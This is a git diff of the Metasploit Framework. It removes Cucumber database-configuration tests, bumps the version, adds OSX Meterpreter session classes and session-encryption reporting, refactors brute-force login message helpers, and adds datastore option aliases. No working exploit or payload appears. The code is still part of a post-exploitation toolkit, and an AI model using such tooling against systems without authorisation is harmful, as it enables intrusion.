| MSF_DATABASE_CONFIG |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And a directory named ".msf4"
|
||||
And I cd to ".msf4"
|
||||
And a file named "database.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: user_metasploit_framework_test
|
||||
username: user_metasploit_framework_test
|
||||
"""
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "user_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
|
||||
Given I unset the environment variables:
|
||||
| variable |
|
||||
| MSF_DATABASE_CONFIG |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "project_metasploit_framework_test"
|
||||
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
|
||||
Given I unset the environment variables:
|
||||
| variable |
|
||||
| MSF_DATABASE_CONFIG |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" does not exist
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should not contain "command_line_metasploit_framework_test"
|
||||
And the output should not contain "environment_metasploit_framework_test"
|
||||
And the output should not contain "user_metasploit_framework_test"
|
||||
And the output should not contain "project_metasploit_framework_test"
|
||||
And the output should contain "[*] postgresql selected, no connection"
|
||||
|
||||
Scenario: Starting `msfconsole` with a valid database.yml
|
||||
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "[*] postgresql connected to metasploit_framework_test"
|
||||
|
|
@ -1,20 +0,0 @@
|
|||
Given /^I unset the environment variables:$/ do |table|
|
||||
table.hashes.each do |row|
|
||||
variable = row['variable'].to_s.upcase
|
||||
|
||||
# @todo add extension to Announcer
|
||||
announcer.instance_eval do
|
||||
if @options[:env]
|
||||
print "$ unset #{variable}"
|
||||
end
|
||||
end
|
||||
|
||||
current_value = ENV.delete(variable)
|
||||
|
||||
# if original_env already has the key, then the true original was already recorded from a previous unset or set,
|
||||
# so don't record the current value as it will cause ENV not to be restored after the Scenario.
|
||||
unless original_env.key? variable
|
||||
original_env[variable] = current_value
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,14 +0,0 @@
|
|||
require 'metasploit/framework/database/cucumber'
|
||||
|
||||
Given /^the project "database.yml" does not exist$/ do
|
||||
Metasploit::Framework::Database::Cucumber.backup_project_configurations
|
||||
end
|
||||
|
||||
Given /^the project "database.yml" exists with:$/ do |file_content|
|
||||
Metasploit::Framework::Database::Cucumber.backup_project_configurations
|
||||
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
|
||||
end
|
||||
|
||||
After do
|
||||
Metasploit::Framework::Database::Cucumber.restore_project_configurations
|
||||
end
|
|
@ -1,26 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
case ARGV[0]
|
||||
when 'size'
|
||||
puts "30 134"
|
||||
when '-a'
|
||||
puts <<EOS
|
||||
speed 38400 baud; 30 rows; 134 columns;
|
||||
lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
|
||||
-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
|
||||
-extproc
|
||||
iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
|
||||
-ignbrk brkint -inpck -ignpar -parmrk
|
||||
oflags: opost onlcr -oxtabs -onocr -onlret
|
||||
cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
|
||||
-dtrflow -mdmbuf
|
||||
cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
|
||||
eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
|
||||
min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
|
||||
stop = ^S; susp = ^Z; time = 0; werase = ^W;
|
||||
EOS
|
||||
when '-g'
|
||||
puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
|
||||
end
|
||||
|
||||
exit 0
|
|
@ -1,34 +0,0 @@
|
|||
# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only
|
||||
# that child process needs to load 'simplecov'.
|
||||
|
||||
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
|
||||
# It is recommended to regenerate this file in the future when you upgrade to a
|
||||
# newer version of cucumber-rails. Consider adding your own code to a new file
|
||||
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
|
||||
# files.
|
||||
|
||||
require 'cucumber/rails'
|
||||
require 'aruba/cucumber'
|
||||
|
||||
# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
|
||||
# order to ease the transition to Capybara we set the default here. If you'd
|
||||
# prefer to use XPath just remove this line and adjust any selectors in your
|
||||
# steps to use the XPath syntax.
|
||||
Capybara.default_selector = :css
|
||||
|
||||
# By default, any exception happening in your Rails application will bubble up
|
||||
# to Cucumber so that your scenario will fail. This is a different from how
|
||||
# your application behaves in the production environment, where an error page will
|
||||
# be rendered instead.
|
||||
#
|
||||
# Sometimes we want to override this default behaviour and allow Rails to rescue
|
||||
# exceptions and display an error page (just like when the app is running in production).
|
||||
# Typical scenarios where you want to do this is when you test your error pages.
|
||||
# There are two ways to allow Rails to rescue exceptions:
|
||||
#
|
||||
# 1) Tag your scenario (or feature) with @allow-rescue
|
||||
#
|
||||
# 2) Set the value below to true. Beware that doing this globally is not
|
||||
# recommended as it will mask a lot of errors for you!
|
||||
#
|
||||
ActionController::Base.allow_rescue = false
|
|
@ -1,39 +0,0 @@
|
|||
Before do
|
||||
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
|
||||
set_env('RAILS_ENV', 'test')
|
||||
@aruba_timeout_seconds = 8.minutes
|
||||
end
|
||||
|
||||
Before('@db') do |scenario|
|
||||
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
end
|
||||
|
||||
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
|
||||
# unless Bundler.settings.without.include?(:coverage)
|
||||
# Before do |scenario|
|
||||
# command_name = case scenario
|
||||
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
|
||||
# "#{scenario.feature.title} #{scenario.name}"
|
||||
# when Cucumber::Ast::OutlineTable::ExampleRow
|
||||
# scenario_outline = scenario.scenario_outline
|
||||
#
|
||||
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
|
||||
# else
|
||||
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
|
||||
# end
|
||||
#
|
||||
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
|
||||
# # of overwriting each other as 'Cucumber Features'
|
||||
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
|
||||
#
|
||||
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
|
||||
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
|
||||
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
|
||||
# end
|
||||
#
|
||||
# Before('@db') do |scenario|
|
||||
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
# ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
# end
|
||||
# end
|
|
@ -1,16 +0,0 @@
|
|||
# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes
|
||||
|
||||
simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME']
|
||||
|
||||
# will not be set if hook does not run because `bundle install --without coverage`
|
||||
if simplecov_command_name
|
||||
require 'simplecov'
|
||||
|
||||
require 'pathname'
|
||||
|
||||
root = Pathname(__FILE__).expand_path.parent.parent.parent
|
||||
|
||||
SimpleCov.command_name(simplecov_command_name)
|
||||
SimpleCov.root(root)
|
||||
load root.join('.simplecov')
|
||||
end
|
|
@ -1,11 +0,0 @@
|
|||
require 'pathname'
|
||||
|
||||
support = Pathname.new(__FILE__).realpath.parent
|
||||
|
||||
paths = [
|
||||
# adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
|
||||
# output.
|
||||
support.join('bin').to_path,
|
||||
ENV['PATH']
|
||||
]
|
||||
ENV['PATH'] = paths.join(File::PATH_SEPARATOR)
|
|
@ -1,7 +0,0 @@
|
|||
windows:
|
||||
-
|
||||
hostname: wxpsp0
|
||||
ip: 127.0.0.100
|
||||
-
|
||||
hostname: wxpsp2
|
||||
ip: 127.0.0.101
|
|
@ -1,36 +0,0 @@
|
|||
require 'metasploit/framework/database'
|
||||
|
||||
module Metasploit::Framework::Database::Cucumber
|
||||
def self.project_configurations_path
|
||||
Rails.root.join('config', 'database.yml').to_path
|
||||
end
|
||||
|
||||
def self.backup_project_configurations
|
||||
if File.exist?(project_configurations_path)
|
||||
# assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
|
||||
# just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
|
||||
if File.exist?(backup_project_configurations_path)
|
||||
File.delete(project_configurations_path)
|
||||
else
|
||||
# project contains the real database.yml and there was no previous, aborted run.
|
||||
File.rename(project_configurations_path, backup_project_configurations_path)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def self.backup_project_configurations_path
|
||||
"#{project_configurations_path}.cucumber.bak"
|
||||
end
|
||||
|
||||
def self.restore_project_configurations
|
||||
if File.exist?(backup_project_configurations_path)
|
||||
if File.exist?(project_configurations_path)
|
||||
# Remove fake, leftover database.yml
|
||||
File.delete(project_configurations_path)
|
||||
end
|
||||
|
||||
File.rename(backup_project_configurations_path, project_configurations_path)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.15.0"
|
||||
VERSION = "4.16.0"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -541,6 +541,7 @@ class ReadableText
|
|||
columns << 'Id'
|
||||
columns << 'Type'
|
||||
columns << 'Checkin?' if show_extended
|
||||
columns << 'Enc?' if show_extended
|
||||
columns << 'Local URI' if show_extended
|
||||
columns << 'Information'
|
||||
columns << 'Connection'
|
||||
|
@ -575,6 +576,12 @@ class ReadableText
|
|||
row << '?'
|
||||
end
|
||||
|
||||
if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key]
|
||||
row << "Y"
|
||||
else
|
||||
row << 'N'
|
||||
end
|
||||
|
||||
if session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty?
|
||||
row << " (#{session.exploit_datastore['LURI']})"
|
||||
else
|
||||
|
@ -616,12 +623,16 @@ class ReadableText
|
|||
sess_uuid = session.payload_uuid.to_s
|
||||
sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
|
||||
sess_luri = session.exploit_datastore['LURI'] || ""
|
||||
sess_enc = false
|
||||
if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key]
|
||||
sess_enc = true
|
||||
end
|
||||
|
||||
sess_checkin = "<none>"
|
||||
sess_registration = "No"
|
||||
|
||||
if session.respond_to? :platform
|
||||
sess_type << (" " + session.platform)
|
||||
if session.respond_to?(:platform)
|
||||
sess_type << " " + session.platform
|
||||
end
|
||||
|
||||
if session.respond_to?(:last_checkin) && session.last_checkin
|
||||
|
@ -640,6 +651,7 @@ class ReadableText
|
|||
out << " Info: #{sess_info}\n"
|
||||
out << " Tunnel: #{sess_tunnel}\n"
|
||||
out << " Via: #{sess_via}\n"
|
||||
out << " Encrypted: #{sess_enc}\n"
|
||||
out << " UUID: #{sess_uuid}\n"
|
||||
out << " CheckIn: #{sess_checkin}\n"
|
||||
out << " Registered: #{sess_registration}\n"
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
|
|
|
@ -43,6 +43,8 @@ module MeterpreterOptions
|
|||
|
||||
valid = true
|
||||
|
||||
session.tlv_enc_key = session.core.negotiate_tlv_encryption
|
||||
|
||||
if datastore['AutoVerifySession']
|
||||
if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i)
|
||||
print_error("Meterpreter session #{session.sid} is not valid and will be closed")
|
||||
|
@ -52,14 +54,13 @@ module MeterpreterOptions
|
|||
|
||||
if valid
|
||||
# always make sure that the new session has a new guid if it's not already known
|
||||
guid = session.core.get_session_guid
|
||||
guid = session.session_guid
|
||||
if guid == '00000000-0000-0000-0000-000000000000'
|
||||
guid = SecureRandom.uuid
|
||||
session.core.set_session_guid(guid)
|
||||
session.guid = guid
|
||||
session.session_guid = guid
|
||||
# TODO: New statgeless session, do some account in the DB so we can track it later.
|
||||
else
|
||||
session.guid = guid
|
||||
# TODO: This session was either staged or previously known, and so we shold do some accounting here!
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/meterpreter'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'osx'
|
||||
self.base_arch = ARCH_X64
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -21,6 +21,10 @@ class Meterpreter_x64_Win < Msf::Sessions::Meterpreter
|
|||
def lookup_error(code)
|
||||
Msf::WindowsError.description(code)
|
||||
end
|
||||
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/meterpreter'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'osx'
|
||||
self.base_arch = ARCH_X86
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -21,6 +21,10 @@ class Meterpreter_x86_Win < Msf::Sessions::Meterpreter
|
|||
def lookup_error(code)
|
||||
Msf::WindowsError.description(code)
|
||||
end
|
||||
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -138,6 +138,14 @@ protected
|
|||
mod.setup
|
||||
mod.framework.events.on_module_run(mod)
|
||||
mod.run
|
||||
rescue Msf::Auxiliary::Complete
|
||||
mod.cleanup
|
||||
return
|
||||
rescue Msf::Auxiliary::Failed => e
|
||||
mod.error = e
|
||||
mod.print_error("Auxiliary aborted due to failure: #{e.message}")
|
||||
mod.cleanup
|
||||
return
|
||||
rescue ::Timeout::Error => e
|
||||
mod.error = e
|
||||
mod.print_error("Auxiliary triggered a timeout exception")
|
||||
|
|
|
@ -108,6 +108,14 @@ protected
|
|||
mod.cleanup
|
||||
return
|
||||
end
|
||||
rescue Msf::Post::Complete
|
||||
mod.cleanup
|
||||
return
|
||||
rescue Msf::Post::Failed => e
|
||||
mod.error = e
|
||||
mod.print_error("Post aborted due to failure: #{e.message}")
|
||||
mod.cleanup
|
||||
return
|
||||
rescue ::Timeout::Error => e
|
||||
mod.error = e
|
||||
mod.print_error("Post triggered a timeout exception")
|
||||
|
|
|
@ -15,6 +15,12 @@ class Auxiliary < Msf::Module
|
|||
|
||||
require 'msf/core/auxiliary/mixins'
|
||||
|
||||
class Complete < RuntimeError
|
||||
end
|
||||
|
||||
class Failed < RuntimeError
|
||||
end
|
||||
|
||||
include HasActions
|
||||
|
||||
#
|
||||
|
@ -152,6 +158,11 @@ class Auxiliary < Msf::Module
|
|||
}
|
||||
end
|
||||
|
||||
# Override Msf::Module#fail_with for Msf::Simple::Auxiliary::job_run_proc
|
||||
def fail_with(reason, msg = nil)
|
||||
raise Msf::Auxiliary::Failed, "#{reason.to_s}: #{msg}"
|
||||
end
|
||||
|
||||
attr_accessor :queue
|
||||
|
||||
protected
|
||||
|
|
|
@ -362,7 +362,6 @@ module Auxiliary::AuthBrute
|
|||
# Note, these special username/passwords should get deprecated
|
||||
# some day. Note2: Don't use with SMB and FTP at the same time!
|
||||
def translate_proto_datastores
|
||||
switched = false
|
||||
['SMBUser','FTPUSER'].each do |u|
|
||||
if datastore[u] and !datastore[u].empty?
|
||||
datastore['USERNAME'] = datastore[u]
|
||||
|
@ -547,6 +546,20 @@ module Auxiliary::AuthBrute
|
|||
end
|
||||
end
|
||||
|
||||
def vprint_status(msg='')
|
||||
print_brute :level => :vstatus
|
||||
end
|
||||
|
||||
def vprint_error(msg='')
|
||||
print_brute :level => :verror
|
||||
end
|
||||
|
||||
alias_method :vprint_bad, :vprint_error
|
||||
|
||||
def vprint_good(msg='')
|
||||
print_brute :level => :vgood
|
||||
end
|
||||
|
||||
# Provides a consistant way to display messages about AuthBrute-mixed modules.
|
||||
# Acceptable opts are fairly self-explanatory, but :level can be tricky.
|
||||
#
|
||||
|
@ -568,10 +581,10 @@ module Auxiliary::AuthBrute
|
|||
end
|
||||
host_ip = opts[:ip] || opts[:rhost] || opts[:host] || (rhost rescue nil) || datastore['RHOST']
|
||||
host_port = opts[:port] || opts[:rport] || (rport rescue nil) || datastore['RPORT']
|
||||
msg = opts[:msg] || opts[:message] || opts[:legacy_msg]
|
||||
msg = opts[:msg] || opts[:message]
|
||||
proto = opts[:proto] || opts[:protocol] || proto_from_fullname
|
||||
|
||||
complete_message = build_brute_message(host_ip,host_port,proto,msg,!!opts[:legacy_msg])
|
||||
complete_message = build_brute_message(host_ip,host_port,proto,msg)
|
||||
|
||||
print_method = "print_#{level}"
|
||||
if self.respond_to? print_method
|
||||
|
@ -582,36 +595,26 @@ module Auxiliary::AuthBrute
|
|||
end
|
||||
|
||||
# Depending on the non-nil elements, build up a standardized
|
||||
# auth_brute message, but support the old style used by
|
||||
# vprint_status and friends as well.
|
||||
def build_brute_message(host_ip,host_port,proto,msg,legacy)
|
||||
# auth_brute message.
|
||||
def build_brute_message(host_ip,host_port,proto,msg)
|
||||
ip = host_ip.to_s.strip if host_ip
|
||||
port = host_port.to_s.strip if host_port
|
||||
complete_message = nil
|
||||
extracted_message = nil
|
||||
if legacy # TODO: This is all a workaround until I get a chance to get rid of the legacy messages
|
||||
old_msg = msg.to_s.strip
|
||||
msg_regex = /(#{ip})(:#{port})?(\s*-?\s*)(#{proto.to_s})?(\s*-?\s*)(.*)/ni
|
||||
if old_msg.match(msg_regex) and !old_msg.match(msg_regex)[6].to_s.strip.empty?
|
||||
if old_msg.match(msg_regex)
|
||||
complete_message = msg.to_s.strip
|
||||
else
|
||||
complete_message = ''
|
||||
unless ip.blank? && port.blank?
|
||||
complete_message << "#{ip}:#{rport}"
|
||||
complete_message << "#{ip}:#{port}"
|
||||
else
|
||||
complete_message << (old_msg.match(msg_regex)[4] || proto).to_s
|
||||
complete_message << proto || 'Bruteforce'
|
||||
end
|
||||
|
||||
complete_message << " - "
|
||||
progress = tried_over_total(ip,port)
|
||||
complete_message << progress if progress
|
||||
complete_message << old_msg.match(msg_regex)[6].to_s.strip
|
||||
else
|
||||
complete_message = msg.to_s.strip
|
||||
end
|
||||
else
|
||||
complete_message = ''
|
||||
complete_message << "#{proto.to_s.strip} - " if proto
|
||||
progress = tried_over_total(ip,port)
|
||||
complete_message << progress if progress
|
||||
complete_message << msg.to_s.strip
|
||||
end
|
||||
end
|
||||
|
@ -657,23 +660,6 @@ module Auxiliary::AuthBrute
|
|||
File.split(self.fullname).last.match(/^(.*)_(login|auth|identify)/)[1].upcase rescue nil
|
||||
end
|
||||
|
||||
# Legacy vprint
|
||||
def vprint_status(msg='')
|
||||
print_brute :level => :vstatus, :legacy_msg => msg
|
||||
end
|
||||
|
||||
# Legacy vprint
|
||||
def vprint_error(msg='')
|
||||
print_brute :level => :verror, :legacy_msg => msg
|
||||
end
|
||||
|
||||
alias_method :vprint_bad, :vprint_error
|
||||
|
||||
# Legacy vprint
|
||||
def vprint_good(msg='')
|
||||
print_brute :level => :vgood, :legacy_msg => msg
|
||||
end
|
||||
|
||||
# This method deletes the dictionary files if requested
|
||||
def cleanup_files
|
||||
path = datastore['USERPASS_FILE']
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
##
|
||||
|
||||
module Msf
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
##
|
||||
|
||||
module Msf
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
##
|
||||
|
||||
module Msf
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
|
||||
require 'net/https'
|
||||
require 'net/http'
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
|
||||
require 'net/https'
|
||||
require 'net/http'
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'uri'
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
|
||||
require 'net/https'
|
||||
require 'net/http'
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# https://metasploit.com/framework/
|
||||
|
||||
require 'net/https'
|
||||
require 'net/http'
|
||||
|
|
|
@ -14,10 +14,13 @@ class DataStore < Hash
|
|||
#
|
||||
def initialize()
|
||||
@options = Hash.new
|
||||
@aliases = Hash.new
|
||||
@imported = Hash.new
|
||||
@imported_by = Hash.new
|
||||
end
|
||||
|
||||
attr_accessor :aliases
|
||||
|
||||
#
|
||||
# Clears the imported flag for the supplied key since it's being set
|
||||
# directly.
|
||||
|
@ -136,6 +139,11 @@ class DataStore < Hash
|
|||
def import_option(key, val, imported = true, imported_by = nil, option = nil)
|
||||
self.store(key, val)
|
||||
|
||||
if option
|
||||
option.aliases.each do |a|
|
||||
@aliases[a.downcase] = key.downcase
|
||||
end
|
||||
end
|
||||
@options[key] = option
|
||||
@imported[key] = imported
|
||||
@imported_by[key] = imported_by
|
||||
|
@ -245,9 +253,15 @@ protected
|
|||
#
|
||||
def find_key_case(k)
|
||||
|
||||
# Scan each alias looking for a key
|
||||
search_k = k.downcase
|
||||
if @aliases.has_key?(search_k)
|
||||
search_k = @aliases[search_k]
|
||||
end
|
||||
|
||||
# Scan each key looking for a match
|
||||
self.each_key do |rk|
|
||||
if (rk.downcase == k.downcase)
|
||||
if rk.downcase == search_k
|
||||
return rk
|
||||
end
|
||||
end
|
||||
|
@ -317,6 +331,7 @@ class ModuleDataStore < DataStore
|
|||
self.keys.each do |k|
|
||||
clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k])
|
||||
end
|
||||
clone.aliases = self.aliases
|
||||
clone
|
||||
end
|
||||
end
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue